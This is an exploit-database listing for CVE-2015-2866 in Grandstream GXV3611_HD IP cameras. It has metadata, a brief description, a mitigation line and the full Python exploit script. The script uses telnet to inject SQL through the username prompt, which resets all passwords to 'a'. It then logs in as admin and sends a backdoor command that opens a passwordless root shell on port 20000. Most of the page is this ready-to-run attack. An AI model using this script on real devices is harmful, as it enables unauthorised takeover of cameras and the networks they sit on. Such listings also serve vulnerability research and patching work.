Grandstream GXV3611_HD Telnet SQL Injection and backdoor command

vendor:

GXV3611_HD

by:

pizza1337

7,5

CVSS

HIGH

SQL Injection and backdoor command

CWE

Product Name: GXV3611_HD

Affected Version From: GXV3611_HD Core 1.0.3.6, 1.0.4.3, GXV3611IR_HD Core 1.0.3.5

Affected Version To: GXV3611_HD Core 1.0.4.3, GXV3611IR_HD Core 1.0.3.5

Patch Exists: YES

Related CWE: CVE-2015-2866

CPE: h:grandstream:gxv3611_hd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: GXV3611_HD, GXV3611IR_HD

2015

Grandstream GXV3611_HD Telnet SQL Injection and backdoor command

Grandstream GXV3611_HD Telnet SQL Injection and backdoor command vulnerability allows an attacker to gain access to the telnet server by using a backdoor command and changing the admin password to 'a'. This can be done by using telnetlib and sending the command ';update user set password='a';--' to the telnet server. After this, the attacker can telnet into port 20000 with username root and no password to get shell.

Mitigation:

The user should update the firmware to the latest version and use strong passwords for the telnet server.

Source

Exploit-DB raw data:

# Exploit Title: Grandstream GXV3611_HD Telnet SQL Injection and backdoor command
# Exploit Author: pizza1337
# Vendor Homepage: http://www.grandstream.com/
# Version: GXV3611_HD Core 1.0.3.6, 1.0.4.3
# GXV3611IR_HD Core 1.0.3.5
# Tested on:
# -GXV3611_HD
#  Bootloader Version: 	1.0.0.0
#  Core Version: 	1.0.4.3
#  Base Version: 	1.0.4.43
#  Firmware Version: 	1.0.4.43
# -GXV3611IR_HD
#  Bootloader Version:  1.0.3.5
#  Core Version:        1.0.3.5
#  Base Version:        1.0.3.5
#  Firmware Version:    1.0.3.5
# CVE : CVE-2015-2866
# Category: remote
# More information:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2866
# https://www.kb.cert.org/vuls/id/253708
# Description:
# http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html
import telnetlib
import sys

if len(sys.argv) < 2:
    print "USAGE: python %s IP_ADDRESS"%sys.argv[0]
    quit()

conn = telnetlib.Telnet(sys.argv[1])
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") #This changes all the passwords to a, including the admin password
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") #Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup. For some reason, typing "!#/ port" does not seem to work.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
print "Telnet into port 20000 with username root and no password to get shell" #There is no login password